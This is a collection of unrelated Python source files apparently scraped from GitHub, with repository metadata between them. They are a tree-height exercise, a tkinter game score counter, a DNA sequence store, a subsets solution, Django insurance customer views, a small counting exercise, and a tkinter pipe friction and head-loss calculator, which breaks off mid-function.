    order, that node's child count followed by the child values. A leading
    -1 denotes an empty tree (returns None).
    """
    pos = 0
    root_data = li[pos]
    pos += 1
    if root_data == -1:
        return None
    root = TreeNode(root_data)
    pending = queue.Queue()
    pending.put(root)
    while not pending.empty():
        node = pending.get()
        child_count = li[pos]
        pos += 1
        for child_data in li[pos:pos + child_count]:
            child = TreeNode(child_data)
            node.children.append(child)
            pending.put(child)
        pos += child_count
    return root
#main
sys.setrecursionlimit(10**6)
## Read input as specified in the question.
## Print output as specified in the question.
def height(root):
    """Return the number of levels in a generic tree (0 for an empty tree)."""
    if root is None:
        return 0
    tallest_child = 0
    for child in root.children:
        tallest_child = max(tallest_child, height(child))
    return tallest_child + 1
li = [int(elem) for elem in list(input().strip().split())]
root = inputLevelWise(li)
print(height(root))
| Riyachauhan11/Python-learning-Concepts | Generic Trees/Height Of Tree.py | Height Of Tree.py | py | 1,184 | python | en | code | 0 | github-code | 36 |
304836991 | import tkinter as tk
import os.path
#ERROR MESSAGES
ERROR_NO_GAME_NAME = "Please enter a game name"
ERROR_ENTER_SOMETHING = "Please enter something"
ERROR_GAME_NAME_NOT_CHANGED = "Game name not changed"
#STANDARD MESSAGES
GAME_SELECTED = "Game selected"
SCORE_SEPARATOR = "/"
SCORE_RESET = "Score reset"
GAME_WON_VICTORY = "Victory"
GAME_LOST_DEFEAT = "Defeat"
ENTER_GAME_NAME = "Game name "
SET_GAME = "Set game"
ENTER_PREFIX_TEXT = "Prefix text"
SET_PREFIX_TEXT = "Set prefix text"
PREFIX_TEXT_SET = "Prefix text : "
TEXT_SCORE = "Score"
TEXT_RESTART = "Restart"
TEXT_WIN_BUTTON = "Victory"
TEXT_LOSS_BUTTON = "Defeat"
TEXT_DEBUG_MODE = "Debug mod"
TEXT_DEBUG_MODE_ACTIVATED = "Debug mode activated"
TEXT_DEBUG_MODE_DEACTIVATED = "Debug mode deactivated"
FILE_EXTENSION = ".txt"
TEXT_SCORE_RESET = "Score reset"
TEXT_GAME_SCORE = "Game score : "
TEXT_IS_EMPTY_FILE = " is empty"
TEXT_VOID = ""
#Program specific stuff
gameName = TEXT_VOID
gameText = TEXT_VOID
DEBUG_MODE = False
NB_CHAR = 20
WINDOW_WIDTH = 400
WINDOW_HEIGHT = 200
WINDOW_NAME = "Game Score Counter"
#Colors
WHITE = "white"
WIN = 1
LOSE = 0
WRITE = "w"
READ = "r"
TOP = "top"
BOTTOM = "bottom"
LEFT = "left"
RIGHT = "right"
def debug(text):
    #Shows the message sent in argument if the counter is in debug mode
    # Reads the module-level DEBUG_MODE flag toggled by changeDebugMode().
    if(DEBUG_MODE == True):
        print(text)
def emptyFile(file):
    """Return True when the already-open file holds nothing or a lone newline.

    Consumes the file: the read position is left at end-of-file.
    """
    content = file.read()
    return content in ("\n", "")
def isValidFileName(fileName):
    """Return True when *fileName* contains no Windows-forbidden character.

    Bug fix: the original loop never incremented its index, so any name whose
    first character was legal spun forever — and only that first character
    was ever inspected. Check every character instead.
    """
    forbidden = ('/', '\\', '?', '%', '*', ':', '|', '"', '<', '>')
    return all(char not in forbidden for char in fileName)
def isNumber(char):
    """Return True for the ASCII digits '0'..'9' only.

    Deliberately narrower than str.isdigit(), which also accepts
    non-ASCII digit characters.
    """
    return '0' <= char <= '9'
def changeDebugMode():
    #Switches the debug mode
    # Flips the module-level DEBUG_MODE flag read by debug() and announces
    # the new state on stdout.
    global DEBUG_MODE
    DEBUG_MODE = (DEBUG_MODE == False)
    if(DEBUG_MODE):
        print(TEXT_DEBUG_MODE_ACTIVATED)
    else:
        print(TEXT_DEBUG_MODE_DEACTIVATED)
def readNumbers(lineRead):
    """Return every maximal run of ASCII digits in *lineRead* as a list of ints.

    Example: "1x23y4" -> [1, 23, 4].

    Rewritten as a single linear scan; this also fixes the original crash on
    an empty string (it unconditionally indexed lineRead[end - 1]) — an empty
    input now returns [].
    """
    numbers = []
    digits = ""
    for char in lineRead:
        if '0' <= char <= '9':
            digits += char
        elif digits:
            # A non-digit ends the current run.
            numbers.append(int(digits))
            digits = ""
    if digits:
        # Flush a run that reaches the end of the string.
        numbers.append(int(digits))
    return numbers
class Counter(tk.Frame):
    """tkinter frame that tracks win/loss scores, one text file per game.

    The score file is "<gameName>.txt" and holds the prefix text followed by
    "<wins><separator><loses>". The current game name and prefix text live in
    the module-level globals ``gameName`` / ``gameText``.
    """
    def isDefinedGameName(self):
        #Checks if the game name is not void
        return(self.getGameName() != TEXT_VOID)
    def getFileName(self):
        #Returns the file name, from the game name and the extension
        gameName = self.getGameName()
        fileName = gameName + FILE_EXTENSION
        return fileName
    def setGameName(self, name):
        #Change the game name
        global gameName
        gameName = name
    def getGameName(self):
        #Return the game name
        return gameName
    def setGameText(self, name):
        #Change the prefix text
        global gameText
        gameText = name
        debug(PREFIX_TEXT_SET + self.getGameText())
    def getGameText(self):
        #Return the prefix text
        return gameText
    def createGame(self):
        #Create the game file, and write the starting score (0/0) in it
        fileName = self.getFileName()
        file = open(fileName,WRITE)
        file.write(self.getGameText())
        file.write("0" + SCORE_SEPARATOR + "0")
        file.close()
        self.updateGameScore()
    def restart(self):
        #Recreate the game file, erasing the previous score
        if(self.isDefinedGameName()):
            self.createGame()
            self.updateShownMessage(SCORE_RESET)
            debug(TEXT_SCORE_RESET)
        else:
            self.updateShownMessage(ERROR_NO_GAME_NAME)
    def win(self):
        #Adds one to the number of wins
        if(self.isDefinedGameName()):
            self.changeScore(WIN)
        else:
            self.updateShownMessage(ERROR_NO_GAME_NAME)
    def lose(self):
        #Adds one to the number of loses
        if(self.isDefinedGameName()):
            self.changeScore(LOSE)
        else:
            self.updateShownMessage(ERROR_NO_GAME_NAME)
    def getScore(self, scoreLine):
        #Parse "<wins> ... <loses>" out of *scoreLine*.
        # NOTE(review): assumes scoreLine contains at least two numbers;
        # fewer would raise IndexError — confirm callers guarantee this.
        scoreTab = readNumbers(scoreLine)
        wins = scoreTab[0]
        loses = scoreTab[1]
        return wins, loses
    def changeScore(self, win):
        #Change the score of the game, saving it in the file, and then update it
        #Positive : win ; Negative or null : loss
        if(self.isDefinedGameName()):
            # Clamp the outcome code to {0, 1}
            if win > 1:
                win = 1
            if win < 0 :
                win = 0
            global gameName
            fileName = self.getFileName()
            if os.path.isfile(fileName): #Checks if the file exists
                file = open(fileName,READ)
                if(emptyFile(file)):
                    debug(fileName + TEXT_IS_EMPTY_FILE)
                    file.close()
                    self.createGame()
                wins, loses = self.getScore(self.getGameScore())
                wins += win
                loses += 1 - win
                if(win):
                    debug(GAME_WON_VICTORY)
                    self.updateShownMessage(GAME_WON_VICTORY)
                else:
                    debug(GAME_LOST_DEFEAT)
                    self.updateShownMessage(GAME_LOST_DEFEAT)
                # NOTE(review): file may already be closed by the empty-file
                # branch above; closing twice is harmless but redundant.
                file.close()
                file = open(fileName,WRITE)
                file.write(self.getGameText())
                file.write(str(wins) + SCORE_SEPARATOR + str(loses))
                file.close()
            else: #If not, create the file
                self.createGame()
            self.updateGameScore()
            debug(TEXT_GAME_SCORE + self.getGameScore())
        else:
            self.updateShownMessage(ERROR_NO_GAME_NAME)
    def getGameScore(self):
        #Get the game score from the file as "<wins><separator><loses>"
        fileName = self.getFileName()
        if os.path.isfile(fileName):
            file = open(fileName,READ)
            wins, loses = self.getScore(file.read())
            score = str(wins) + SCORE_SEPARATOR + str(loses)
            file.close()
            return score
        else:
            #Create the file
            file = open(fileName,WRITE)
            file.close()
            # NOTE(review): the recursive result is not returned, so this
            # branch yields None — and the freshly-created file is empty, so
            # the recursive call's getScore would fail anyway. Verify.
            #Should never get an infinite loop since the file is created right before the call
            self.getGameScore()
    def updateShownMessage(self, message):
        #Show *message* in the status label
        self.gameMiscText.configure(text=message)
    def updateGameScore(self):
        #Updates the game score shown
        self.gameScore.configure(text=self.getGameScore())
    def changeGame(self):
        #Change the game name, and if the file corresponding to that game does not exist, create it
        enteredText = self.gameNameEntry.get()
        if(enteredText == TEXT_VOID):
            shownMessage = ERROR_ENTER_SOMETHING + " - " + ERROR_GAME_NAME_NOT_CHANGED
        else:
            self.setGameName(enteredText)
            gameName = self.getGameName()
            fileName = gameName + FILE_EXTENSION
            if not(os.path.isfile(fileName)):
                self.createGame()
            gameScore = self.getGameScore()
            self.updateGameScore()
            debug(self.getGameName())
            shownMessage = GAME_SELECTED + " : " + enteredText
        self.updateShownMessage(shownMessage)
    def changeText(self):
        #Change the text put before the score
        enteredText = self.gameTextEntry.get()
        if(enteredText != TEXT_VOID):
            self.setGameText(enteredText)
            self.updateShownMessage(enteredText)
    def __init__(self, parent):
        """Build all widgets and lay them out inside *parent*."""
        tk.Frame.__init__(self, parent)
        ##Game
        #Name
        self.gameNamePrompt = tk.Label(self, text=ENTER_GAME_NAME)
        self.gameNameEntry = tk.Entry(self, width=NB_CHAR)
        self.gameNameButton = tk.Button(self, text=SET_GAME, command = self.changeGame)
        #Prefix text
        self.gameTextPrompt = tk.Label(self, text=ENTER_PREFIX_TEXT)
        self.gameTextEntry = tk.Entry(self, width=NB_CHAR)
        self.gameTextButton = tk.Button(self, text=SET_PREFIX_TEXT, command = self.changeText)
        #Score
        self.gameScorePrompt = tk.Label(self, text=TEXT_SCORE)
        self.gameScore = tk.Label(self, text=TEXT_VOID, bg=WHITE, width=NB_CHAR)
        #Misc Text
        self.gameMiscText = tk.Label(self, text=TEXT_VOID)
        #Buttons
        # NOTE(review): these assignments shadow the restart/win/lose methods
        # with Button widgets; the commands still hold the bound methods
        # (captured before the rebinding), but the attribute names are
        # misleading — consider renaming the widgets.
        self.restart = tk.Button(self, text=TEXT_RESTART, command = self.restart)
        self.win = tk.Button(self, text=TEXT_WIN_BUTTON, command = self.win)
        self.loss = tk.Button(self, text=TEXT_LOSS_BUTTON, command = self.lose)
        #Checkbutton
        self.debugCheck = tk.Checkbutton(self, text=TEXT_DEBUG_MODE, command = changeDebugMode)
        #Sets the widgets
        self.debugCheck.pack(side=BOTTOM)
        self.gameNamePrompt.pack(side=TOP)
        self.gameNameEntry.pack(side=TOP)
        self.gameTextPrompt.pack(side=TOP)
        self.gameTextEntry.pack(side=TOP)
        self.gameScorePrompt.pack(side=TOP)
        self.gameScore.pack(side=TOP)
        self.gameMiscText.pack(side=TOP)
        self.win.pack(side=LEFT)
        self.loss.pack(side=LEFT)
        self.restart.pack(side=LEFT)
        self.gameNameButton.pack(side=RIGHT)
        self.gameTextButton.pack(side=RIGHT)
# if this is run as a program (versus being imported),
# create a root window and an instance of our example,
# then start the event loop
if __name__ == "__main__":
    root = tk.Tk()
    root.title(WINDOW_NAME)
    root.minsize(WINDOW_WIDTH, WINDOW_HEIGHT)
    Counter(root).pack(fill="both")
    root.mainloop()
class Data:
    """In-memory store of DNA sequences keyed by (numeric id, name).

    All state is CLASS-level (shared by every instance): ``dict`` maps
    (id, name) tuples to sequence strings; the counters feed auto-generated
    names/ids. NOTE(review): ``dict`` and later ``sum``/``id`` shadow
    Python builtins — consider renaming.
    """
    dict={}
    counter=0
    counter2=0
    counter3=0
    index_dic=0
    name_str=""
    def __init__(self):
        pass
    def enter(self,key,value,flag):
        # Validate that *value* is a DNA string (A/C/T/G, either case) and,
        # on success, store it under a fresh numeric id paired with *key*.
        # When *flag* is truthy, positions 32-34 tolerate any character
        # (presumably a header/quality region — TODO confirm intent).
        for i in range(len(value)):
            if value[i] not in 'ACTGactg':
                if not flag:
                    return "not valid string"
                else:
                    if value[i] not in 'ACTGactg' and (i>34 or i<32) :
                        return "not valid string"
        Data.counter+=1
        Data.index_dic+=1
        Data.dict[(Data.index_dic,key)] = value
        print(Data.dict)
        return Data.counter
    def find_name_or_id_by_id_or_name(self,id,ind):
        # Look *id* up in position *ind* of each (id, name) key and return
        # the other component; returns None when nothing matches.
        z = list(Data.dict.keys())
        for i in z:
            if i[ind] == id:
                if ind>0:
                    c = i[0]
                else:
                    c = i[1]
                return c
    def name(self,arr,sum,name):
        # Derive a sequence name from the parsed command tokens *arr*.
        # NOTE(review): when sum==5 this reads arr[5], which raises
        # IndexError if len(arr) == 5 exactly — verify callers' token counts.
        if len(arr) < sum:
            Data.counter2 += 1
            Data.name_str = "seq" + str(Data.counter2)
        elif sum==5:
            temp = arr[5]
            if temp=='@@':
                Data.counter3+=1
                Data.name_str=str(name[1])+ "_s" +str(Data.counter3)
            elif temp[0]=='@':
                Data.name_str=temp[1::]
            else:
                Data.name_str = arr[2]
        return Data.name_str
    def update(self,key,value):
        # Replace the sequence for '#<id>' or '@<name>'.
        # NOTE(review): any other prefix leaves t1/t2 unbound and raises
        # NameError; a missing entry yields a None component in the key.
        x = key
        x1= x[1::]
        if key[0]=='#':
            x2=int(x1)
            c=self.find_name_or_id_by_id_or_name(x2,0)
            t1=c
            t2=x2
        elif key[0]=='@':
            x2=x1
            c = self.find_name_or_id_by_id_or_name(x2, 1)
            t1=x2
            t2=c
        Data.dict[(t2,t1)] = value
    def find(self,index):
        # Return [query-counter, other-key-component, sequence] for
        # '#<id>' or '@<name>'; implicitly returns None when nothing found.
        # NOTE(review): g is a (possibly empty) list, so ``g!=None`` is
        # always True and an empty match raises IndexError on g[0].
        arr=[]
        if index[0]=='#':
            x=index[1::]
            g = [v for k, v in Data.dict.items() if k[0] == int(x)]
            x=int(x)
            c= self.find_name_or_id_by_id_or_name(x,0)
        if index[0]=='@':
            x = index[1::]
            c=x
            g = [v for k, v in Data.dict.items() if k[1] == x]
        if g!=None:
            Data.counter += 1
            arr.append(Data.counter)
            arr.append(c)
            arr.append(g[0])
            return arr
    def delete(self,key):
        # Remove the entry addressed as '#<id>' and return the whole store.
        k=self.find_name_or_id_by_id_or_name(int(key[1::]),0)
        del Data.dict[(int(key[1::]),k)]
        return Data.dict
| RivkiZolti/DNA | Data.py | Data.py | py | 2,511 | python | en | code | 3 | github-code | 36 |
28924212361 | from typing import List
"""
method 1 : iterative call without for loop
"""
class Solution:
    """Generate all subsets (the power set) of a list of numbers."""

    def subsets(self, nums: List[int]) -> List[List[int]]:
        """Return every subset of *nums* via include/exclude DFS.

        Fixes: removed the leftover debug ``print``; backtracking now uses
        O(1) ``list.pop()`` instead of O(n) ``list.remove()``; the
        include/exclude comments were swapped in the original.
        """
        results = []
        length = len(nums)

        def make_dfs_subset(subset, cur_idx):
            # All indices decided: record a snapshot of the current subset.
            if cur_idx == length:
                results.append(list(subset))
                return
            # Exclude nums[cur_idx]
            make_dfs_subset(subset, cur_idx + 1)
            # Include nums[cur_idx], recurse, then backtrack
            subset.append(nums[cur_idx])
            make_dfs_subset(subset, cur_idx + 1)
            subset.pop()

        make_dfs_subset([], 0)
        return results
"""
idx = 0
"""
[1]
s = Solution()
print(s.subsets([1,2,3]))
| GuSangmo/BOJ_practice | Leetcode/78.subsets.py | 78.subsets.py | py | 766 | python | en | code | 0 | github-code | 36 |
25293683614 | from django.shortcuts import render, redirect, reverse
from . import forms, models
from django.db.models import Sum
from django.contrib.auth.models import Group
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required, user_passes_test
from django.conf import settings
from django.db.models import Q
from insurance import models as CMODEL
from insurance import forms as CFORM
from django.contrib.auth.models import User
def customerclick_view(request):
    """Landing page: authenticated users skip straight to the post-login URL."""
    if not request.user.is_authenticated:
        return render(request, 'customer/customerclick.html')
    return HttpResponseRedirect('afterlogin')
def customer_signup_view(request):
    """Render the sign-up page; on valid POST create the Django user and the
    linked Customer profile, add the user to the CUSTOMER group, then redirect
    to the login page."""
    user_form = forms.CustomerUserForm()
    customer_form = forms.CustomerForm()
    context = {'userForm': user_form, 'customerForm': customer_form}
    if request.method == 'POST':
        user_form = forms.CustomerUserForm(request.POST)
        customer_form = forms.CustomerForm(request.POST, request.FILES)
        if user_form.is_valid() and customer_form.is_valid():
            user = user_form.save()
            user.set_password(user.password)  # hash the raw password
            user.save()
            customer = customer_form.save(commit=False)
            customer.user = user
            customer.save()
            group, _created = Group.objects.get_or_create(name='CUSTOMER')
            group.user_set.add(user)
            return HttpResponseRedirect('customerlogin')
    return render(request, 'customer/customersignup.html', context=context)
def is_customer(user):
    """True when *user* belongs to the CUSTOMER group."""
    customer_groups = user.groups.filter(name='CUSTOMER')
    return customer_groups.exists()
@login_required(login_url='customerlogin')
def customer_dashboard_view(request):
    """Render the customer dashboard with summary counts.

    Fixes: the template context was named ``dict``, shadowing the builtin;
    the Customer row was fetched four separate times — it is now fetched once
    and reused.
    """
    customer = models.Customer.objects.get(user_id=request.user.id)
    context = {
        'customer': customer,
        'available_policy': CMODEL.Policy.objects.all().count(),
        'applied_policy': CMODEL.PolicyRecord.objects.all().filter(
            status='Approved', customer=customer).count(),
        'total_category': CMODEL.Category.objects.all().count(),
        'total_question': CMODEL.Question.objects.all().filter(
            customer=customer).count(),
        'total_events': CMODEL.InsuranceEventRecord.objects.all().filter(
            customer=customer).count(),
    }
    return render(request, 'customer/customer_dashboard.html', context=context)
def apply_policy_view(request):
    """List every policy (ordered by category, then sum assured) so the
    customer can apply."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    available = CMODEL.Policy.objects.all().order_by('category', 'sum_assurance')
    return render(request, 'customer/apply_policy.html',
                  {'policies': available, 'customer': customer})
def apply_view(request, pk):
    """Create a new PolicyRecord linking this customer to policy *pk*,
    then return to the policy list."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    chosen_policy = CMODEL.Policy.objects.get(id=pk)
    record = CMODEL.PolicyRecord()
    record.Policy = chosen_policy
    record.customer = customer
    record.save()
    return redirect('apply-policy')
def my_products_view(request):
    """Show the customer's approved policies plus their total premium."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    policies = CMODEL.PolicyRecord.objects.all().filter(customer=customer, status='Approved')
    # NOTE(review): this aggregates over ALL of the customer's records, not
    # just the approved ones listed above, and Sum yields None when there are
    # no rows — confirm the template tolerates a None 'totalsum'.
    total_sum = CMODEL.PolicyRecord.objects.filter(customer=customer).aggregate(sum=Sum('premium'))
    total_sum_number = total_sum['sum']
    return render(request, 'customer/myproducts.html', {'policies': policies, 'customer': customer, 'totalsum': total_sum_number})
def ask_question_view(request):
    """Display the question form; on valid POST save the question for this
    customer and jump to the question history."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    form = CFORM.QuestionForm()
    if request.method == 'POST':
        form = CFORM.QuestionForm(request.POST)
        if form.is_valid():
            new_question = form.save(commit=False)
            new_question.customer = customer
            new_question.save()
            return redirect('question-history')
    return render(request, 'customer/ask_question.html', {'questionForm': form, 'customer': customer})
def question_history_view(request):
    """List every question this customer has asked."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    asked = CMODEL.Question.objects.all().filter(customer=customer)
    return render(request, 'customer/question_history.html', {'questions': asked, 'customer': customer})
# Insurance-event views (translated from Czech: "add insurance events class")
def customer_event_view(request):
    """List this customer's insurance events, ordered by creation date."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    event_records = CMODEL.InsuranceEventRecord.objects.all().filter(customer=customer).order_by('creation_date')
    return render(request, 'customer/customer_view_event.html', {'events': event_records, 'customer': customer})
def customer_event_add(request):
    """Display the event form; on valid POST record a new insurance event for
    this customer and return to the event list."""
    customer = models.Customer.objects.get(user_id=request.user.id)
    form = CFORM.EventForm()
    if request.method == 'POST':
        form = CFORM.EventForm(request.POST)
        if form.is_valid():
            event = form.save(commit=False)  # renamed: was misleadingly 'question'
            event.customer = customer
            event.save()
            return redirect('customer-event-views')
    return render(request, 'customer/customer_event_add.html', {'eventForm': form, 'customer': customer})
'''Exercise 6: count the positive numbers entered at the keyboard.
(The original Spanish statement says input stops when a NEGATIVE number is
entered and that the negative does not count.)'''
# NOTE(review): the implementation terminates on 0, not on a negative number
# as the exercise statement requires — confirm which behaviour is intended.
number=int(input('Ingrese un numero positivo y 0 para terminar: '))
cont=0
while number!=0:
    if number>0:
        cont+=1  # only strictly-positive entries are counted
    number=int(input('Ingrese un numero positivo y 0 para terminar: '))
print('Usted ingreso',cont,'positivos.')
30314652001 | # -*- coding: utf-8 -*-
"""
Created by Vincenzo Sammartano
email: v.sammartano@gmail.com
Last Update: Added the formulation section
"""
import numpy as num
import tkinter as tk
from tkinter import messagebox
from tkinter import font
import webbrowser
##########################################
#Constants
Rf = 287.058 # Universal Constant of Gases [J/(Kg K)]
pAtm = 101325 # [Pa] atmospheric pressure
g = 9.806 # [m/s2] gravitational accelaration
##########################################
#List of fluids
flu_opt = ['Air','Water']
##########################################
#Tkinter Window
root = tk.Tk()
root.geometry("800x770+100+50")
root.title("Skin Friction & Head Losses")
root.resizable(width=False, height=False)
#root.iconbitmap('roughness.ico')
##########################################
#Fonts
f_H12B = font.Font(family='Helvetica', size=12, weight='bold')
f_H12 = font.Font(family='Helvetica', size=12, weight='normal')
f_H11 = font.Font(family='Helvetica', size=11, weight='bold')
f_H10 = font.Font(family='Helvetica', size=10, weight='bold')
f_H08 = font.Font(family='Helvetica', size=8, weight='normal')
f_Ref = font.Font(family='Helvetica', size=12, weight='normal', underline=1)
font.families()
####Frames texts (titles of the labelled frames below)
text0 = "Fluid Parameters"
text1 = "Duct Geometry"
text2 = "Cross Section Definition"
text3 = "Results"
text4 = "Formulation"
#main Frames: inputs on the left, results on the right, formulation/buttons below
left_side = tk.Frame(root,width=500)
left_side.grid(row=0,column=0,rowspan=2, sticky="nsew")
right_side = tk.Frame(root,width=350)
right_side.grid(row=0,column=1,rowspan=2, sticky="nsew")
bottom_frame = tk.Frame(root)
bottom_frame.grid(row=2, column=0, columnspan=2, sticky="ew")
#Subframes - "Fluid Parameters"
frame00 = tk.LabelFrame(left_side,text=text0,width=450,height=150,font=f_H12B)
frame00.grid(row=0, column=0,padx=15,pady=10,ipadx=20,ipady=5)
frame00.config(borderwidth=4)
#Subframes - "Duct Geometry"
frame01 = tk.LabelFrame(left_side,text=text1,width=450,height=150,font=f_H12B)
frame01.grid(row=1, column=0,padx=15,pady=5,ipadx=30,ipady=5)
frame01.config(borderwidth=4)
#Subframes - "Cross Section Definition"
frame02 = tk.LabelFrame(left_side,text=text2,width=450,height=150,font=f_H12B)
frame02.grid(row=2,column=0,padx=15,pady=5,ipadx=5,ipady=6)
frame02.config(borderwidth=4)
#Subframes - "Results"
frame03 = tk.LabelFrame(right_side,text=text3,width=350,font=f_H12B)
frame03.grid(row=0,column=0,padx=15,pady=10,ipadx=4,ipady=4)
frame03.config(borderwidth=4)
#Subframes - "Formulation"
frame04 = tk.LabelFrame(bottom_frame,text=text4,width=50,font=f_H12B)
frame04.pack(padx=5,pady=5)
frame04.config(borderwidth=4)
#Subframes - "Buttons"
frame05 = tk.LabelFrame(bottom_frame,text="",width=50,font=f_H12B)
frame05.pack(padx=5,pady=5)
frame05.config(borderwidth=4)
##########################################
##Functions
def fluid():
    """Return the selected fluid's properties at the entered temperature.

    Reads the GUI temperature entry (T_, in Celsius) and the fluid selector
    (f_sel) and returns [density kg/m3, specific weight N/m3,
    dynamic viscosity Pa*s, kinematic viscosity m2/s].

    Fix: the Celsius-to-Kelvin conversion used 273.17; the correct offset
    is 273.15 K.
    """
    Fp = []
    T = float(T_.get())
    t = T + 273.15 # Kelvin (fixed: was 273.17)
    F = f_sel.get()
    if F == "Air":
        #Air: ideal-gas density at atmospheric pressure
        rot = pAtm/(Rf*t) #Density as function of temperature in Kelvin [Kg/mc]
        gamma_t = rot * g #specific weight at t°C
        #Sutherland Equation for the dynamic viscosity of air
        ba = 1.458*10**(-6)
        sa = 110.4 #Kelvin
        mi = ba * (t**1.5)/(t+sa) #Dinamic Viscosity Pa s = kg m^-1 s^-1
        ni = mi/rot #Cinematic Viscosity m2·s-1
        FpA = [rot,gamma_t,mi,ni]
        Fp = FpA
    if F == "Water":
        #Water - Kell formulation (density as a polynomial in Celsius)
        ro = 999.83952
        At = 1 + (16.879850*10**-3)*T #constant to be used in the Kell formula
        #rot is the water density as function of temperature [Kg/mc]
        rot = (ro + (16.945176*T) - (7.987040*10**-3)*(T**2.0) -
               +(46.17046*10**-6)*(T**3.0) + (105.56302*10**-9)*(T**4.0)-
               +(280.54253*10**-12)*(T**5.0))/At
        gamma_t = rot*g #specific weight at t°C
        #Viscosity correlation, valid for 0<t<370 Celsius
        mi = 2.414*(10**-5)*10**(247.8/(t-140)) #Dinamic Viscosity Pa s = kg m^-1 s^-1
        ni = mi/rot #Kinetic Viscosity m2·s-1
        FpW = [rot,gamma_t,mi,ni]
        Fp = FpW
    return Fp
def UFFF1(EPS,dc,Re,V):
    """Friction factor via Colebrook-White fixed-point iteration, then
    Darcy-Weisbach head losses; stores results in the global RES and
    refreshes the GUI via printOut().

    NOTE(review): EPS comes from an entry labelled [mm] while dc is in [m] —
    the relative roughness EPS/dc looks off by a factor 1000; confirm units.
    """
    lamb_= 0
    ff = fluid()
    L = float(L_.get())  # duct length [m] from the GUI
    #ColebrokWhite Equation
    #First step - Hyp. fully turbulent flow (Re -> infinity limit)
    turbTerm = EPS/(3.71*dc) #turbulent term
    lambInf = 0.25 * (num.log10(turbTerm)**2)**-1
    lamI = lambInf #First value for the friction coefficient
    errLam = 999
    tol = 1e-14
    its = 0
    # Fixed-point iteration until successive estimates agree to `tol`
    while (errLam > tol):
        lamTerm = 2.51/(Re*(lamI**0.5))
        lamII = 0.25 * (num.log10(turbTerm + lamTerm)**2)**-1
        errLam = num.abs((lamI - lamII)/lamI)
        lamI = lamII
        its += 1
    lamb_ = lamI
    LAMB = lamb_
    ####DarcyWeisbach Equation
    J = (LAMB/dc)* V**2/(2*g) #Specific Losses in m/m
    HeadLoss = J*L #Total Losses in m
    HeadLossPa = HeadLoss * ff[1] #Total losses in Pa (gamma * h)
    global RES
    RES = [dc,Re,LAMB,J,HeadLoss,HeadLossPa]
    printOut()
def UFFF2(EPS,dc,Re,V):
    #A New Six Parameter Model to Estimate the Friction Factor
    # Blends the laminar 64/Re law with two sigmoid transition terms, then
    # applies Darcy-Weisbach; results go to the global RES and the GUI.
    # NOTE(review): same EPS [mm] vs dc [m] unit question as UFFF1 — confirm.
    ff = fluid()
    L = float(L_.get())
    l1 = 0.02 #residual stress from laminar to turbulent transition
    t1 = 3000 #Reynolds is number at first transition
    l2 = num.abs(l1-(1/(-2*num.log10(EPS/(3.7065*dc))))**2)
    t2 = (0.77505/(EPS/dc)**2) - (10.984/(EPS/dc)) + 7953.8
    y0 = 64/Re #laminar flow
    y1 = l1 / (1 + num.e**((t1-Re)/100))
    y2 = l2 / (1 + num.e**(((t2-Re)/600)*EPS/dc))
    LAMB = y0 + y1 + y2
    ####DarcyWeisbach Equation
    J = (LAMB/dc)* V**2/(2*g) #Specific Losses in m/m
    HeadLoss = J*L #Total Losses in m
    HeadLossPa = HeadLoss * ff[1] #Total losses in Pa
    global RES
    RES = [dc,Re,LAMB,J,HeadLoss,HeadLossPa]
    printOut()
def printOut():
    """Render fluid properties and the global RES values into the
    Results frame (frame03), one read-only label per quantity."""
    ff = fluid() #[rot,gamma_t,mi,ni]
    labflu = ["{:4.3f}".format(ff[0]),"{:4.3f}".format(ff[1]),"{:1.3e}".format(ff[2]),"{:1.3e}".format(ff[3])]
    labels = ["{:6.3f}".format(RES[0]),"{:8.0f}".format(RES[1]),"{:6.7f}".format(RES[2]),"{:6.7f}".format(RES[3]),"{:6.7f}".format(RES[4]),
              "{:3.4e}".format(RES[5])]
    # Rows 0-3: fluid properties; rows 4-9: computed results
    for i,l in enumerate(labflu):
        tk.Label(frame03,text=l, bg="white",width=15,font=f_H12,anchor='center',borderwidth=2, relief="groove").grid(row=i,column=1,padx=3)
    for i,r in enumerate(labels):
        tk.Label(frame03,text=r, bg="white",width=15,font=f_H12,anchor='center',borderwidth=2, relief="groove").grid(row=i+4,column=1,padx=3)
def calC():
    """Validate inputs for a CIRCULAR duct and run the selected friction
    model (UFFF1/UFFF2) with dc = D, from either velocity or flow rate.

    NOTE(review): a non-positive roughness only shows a warning and does NOT
    abort — the computation still runs; confirm that is intended.
    """
    fp = fluid()
    ni = fp[3]  # kinematic viscosity
    modF_ = modF.get()
    EPS = float(eps_.get())
    D = float(D_.get())
    #Velocity selection
    if modF_ == 1:
        V0 = float(V0_.get())
        if V0 <= 0:
            messagebox.showwarning("Warning","The velocity has to be greater than 0!")
        else:
            if EPS<=0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            if (D <= 0):
                messagebox.showwarning("Warning","The diameter has to be greater than 0!")
            else:
                dc = D
                Ac = 0.25 * num.pi * D**2
                Re = V0 * (dc/ni)
                if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
    #Flow rate
    if modF_ == 2:
        Q0 = float(Q0_.get())
        if Q0 <= 0:
            messagebox.showwarning("Warning","The flow rate has to be greater than 0!")
        else:
            if EPS<=0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            if D<=0:
                messagebox.showwarning("Warning","The diameter has to be greater than 0!")
            else:
                dc = D
                Ac = 0.25 * num.pi * D**2
                V0 = Q0/Ac  # mean velocity from flow rate
                Re = V0 * (dc/ni)
                if modForm.get()==1: UFFF1(EPS,dc,Re,V0)
                elif modForm.get()==2: UFFF2(EPS,dc,Re,V0)
def calR():
    """Validate inputs for a RECTANGULAR duct and run the selected friction
    model using the hydraulic diameter dc = 4*A/P."""
    fp = fluid()
    ni = fp[3]  # kinematic viscosity
    modF_ = modF.get()
    EPS = float(eps_.get())
    sA = float(W_.get())  # width [m]
    sB = float(H_.get())  # height [m]
    if modF_ == 1:
        V0 = float(V0_.get())
        if V0 <= 0:
            messagebox.showwarning("Warning","The velocity has to be greater than 0!")
        else:
            if EPS==0:
                messagebox.showwarning("Warning","The absolute roughness has to be greater than 0!")
            else:
                Ar = sA * sB # area of the section
                if Ar<=0:
